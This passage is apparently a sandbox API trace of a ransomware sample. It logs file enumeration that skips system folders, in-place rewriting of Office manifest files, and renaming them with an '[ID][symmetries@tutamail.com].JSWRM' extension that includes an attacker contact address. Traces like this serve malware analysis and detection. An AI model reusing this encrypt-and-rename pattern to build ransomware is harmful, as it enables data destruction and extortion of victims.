(in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.796] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.796] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.796] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.797] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=9216) returned 1 [0072.797] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.797] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2400) returned 0x24b1c8 [0072.797] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x2400, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x2400, lpOverlapped=0x0) returned 1 [0072.799] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.799] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x2400, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x2400, lpOverlapped=0x0) returned 1 [0072.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.799] CloseHandle (hObject=0x458) returned 1 [0072.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.799] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.799] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.799] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0072.800] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0072.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.800] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.800] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.800] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.800] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x838fd5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x838fd5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP4637~1.XML")) returned 1 [0072.800] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.800] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.800] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.800] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.801] lstrcmpiW (lpString1="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20dec0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e268, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0072.801] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.801] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.801] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.801] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.802] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=1261) returned 1 [0072.802] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.802] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4e0) returned 0x203550 [0072.802] ReadFile (in: hFile=0x458, lpBuffer=0x203550, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesRead=0x345ef6c*=0x4e0, lpOverlapped=0x0) returned 1 [0072.803] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.803] WriteFile (in: hFile=0x458, lpBuffer=0x203550*, nNumberOfBytesToWrite=0x4e0, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x203550*, lpNumberOfBytesWritten=0x345ef68*=0x4e0, lpOverlapped=0x0) returned 1 [0072.803] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x203550 | out: hHeap=0x1e0000) returned 1 [0072.803] CloseHandle (hObject=0x458) returned 1 [0072.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.803] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.803] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0072.804] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0072.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b650 [0072.804] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b650 | out: hHeap=0x1e0000) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.804] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00BA-0409-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00ba-0409-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0072.804] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0072.804] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x8394994f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x8394994f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ea71ba, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x618a8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP2FE2~1.XML")) returned 1 [0072.804] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.804] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.804] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.804] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.804] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.805] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.805] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.805] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.805] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.805] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20e418, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 53 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x20dec0, cbMultiByte=53, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 53 [0072.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ae28 [0072.805] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0072.805] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345efcc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22aff8 [0072.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0072.805] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345ef60 | out: lpFileSize=0x345ef60*=399528) returned 1 [0072.805] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.805] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24b1c8 [0072.805] ReadFile (in: hFile=0x458, lpBuffer=0x24b1c8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ef6c, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesRead=0x345ef6c*=0x27100, lpOverlapped=0x0) returned 1 [0072.856] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0072.856] WriteFile (in: hFile=0x458, lpBuffer=0x24b1c8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ef68, lpOverlapped=0x0 | out: lpBuffer=0x24b1c8*, lpNumberOfBytesWritten=0x345ef68*=0x27100, lpOverlapped=0x0) returned 1 [0072.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1c8 | out: hHeap=0x1e0000) returned 1 [0072.857] CloseHandle (hObject=0x458) returned 1 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0072.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0072.857] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0072.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22af10 [0072.857] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0072.857] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22af10 | out: hHeap=0x1e0000) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0072.858] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00c1-0000-1000-0000000ff1ce.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22aff8 | out: hHeap=0x1e0000) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0072.858] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0072.858] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cAlternateFileName="AP2C4B~1.XML")) returned 1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2=".") returned 1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="..") returned 1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="...") returned 1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="windows") returned -1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="recovery") returned -1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="perflogs") returned -1 [0072.858] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="documents and settings") returned -1 [0072.859] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="$RECYCLE.BIN") returned 1 [0072.859] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="system volume information") returned -1 [0072.859] lstrcmpiW (lpString1="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", lpString2="msocache") returned -1 [0072.859] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0072.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml", cchWideChar=53, lpMultiByteStr=0x0, 